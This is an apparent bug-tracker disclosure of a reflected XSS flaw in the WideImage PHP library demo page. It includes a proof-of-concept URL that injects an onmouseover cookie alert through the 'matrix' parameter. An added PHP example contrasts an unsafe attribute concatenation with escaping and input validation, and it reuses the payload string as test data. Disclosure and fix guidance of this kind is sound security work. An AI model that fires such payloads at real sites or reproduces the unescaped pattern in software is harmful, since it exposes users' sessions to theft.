#42 WideImage PHP library is vulnerable to Reflected XSS Attack

v11.02.19
open
5
2015-07-04
2015-07-04
No

Date: 04/July/2015

Discovered by: Mohammad Sikkandar Sha

Contact Email: sikkandar.lynx@gmail.com

Type of vulnerability: Reflected XSS

Tested on: Windows 8.1

Product: WideImage - An Open Source PHP library for image manipulation.

Version: 11.02.19

Release Date: February 19, 2011

Description: PHP library is vulnerable to Reflected XSS Attack on page -

URL -
http://localhost:8080/vendor/wideimage/demo/?colors=255&demo=applyConvolution&dither=1&dither_cb=1&div=1&match_palette=1&match_palette_cb=1&matrix=2%25200%25200%252c%25200%2520-1%25200%252c%25200%25200%2520-1%22%20onmouseover%3dalert%28document.cookie%29%20bad%3d%22&offset=220&output=preset%20for%20demo

Notified Vendor: July 04, 2015
Response:
Closure:

--
Regards,
Md. Sikkandar Sha

2 Attachments
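
The `matrix` value in the reported URL contains a double quote followed by an event-handler attribute, which is the shape of an injection into a double-quoted HTML attribute. The PHP below is an added example, not WideImage code and not part of the original report. It assumes that attribute context, uses hypothetical function names, and infers the matrix format from the numeric part of the URL. It contrasts unescaped output with context-aware encoding and input validation.

```php
<?php
// Added illustration; not WideImage code. All function names are hypothetical.

// Value of the `matrix` parameter from the reported URL, as PHP would expose it
// in $_GET (PHP has already applied one level of URL decoding).
$matrix = '2%200%200%2c%200%20-1%200%2c%200%200%20-1" onmouseover=alert(document.cookie) bad="';

// Unsafe pattern: request data concatenated into a double-quoted attribute.
// A literal " in the value ends the attribute; the remainder is parsed as new attributes.
function render_input_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// Hardened pattern: encode for the HTML attribute context at output time.
// ENT_QUOTES encodes both " and ', so the value cannot leave the attribute.
function render_input_escaped(string $name, string $value): string
{
    $enc = static fn(string $s): string =>
        htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="' . $enc($name) . '" value="' . $enc($value) . '">';
}

// Defence in depth: a convolution matrix holds only numbers, so reject anything else.
// Assumed format: numbers separated by spaces, rows separated by commas.
function is_valid_matrix(string $value): bool
{
    $num = '-?\d+(?:\.\d+)?';
    return preg_match("/^\s*$num(?:\s+$num)*(?:\s*,\s*$num(?:\s+$num)*)*\s*$/", $value) === 1;
}

// Compare the two renderings of the reported value, then check validation on
// the reported value and on a well-formed matrix.
echo render_input_unsafe('matrix', $matrix), PHP_EOL;
echo render_input_escaped('matrix', $matrix), PHP_EOL;
var_dump(is_valid_matrix($matrix));
var_dump(is_valid_matrix('2 0 0, 0 -1 0, 0 0 -1'));
```

Output encoding is the primary fix because it holds for every parameter the page reflects; the format check only narrows what `matrix` may contain.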
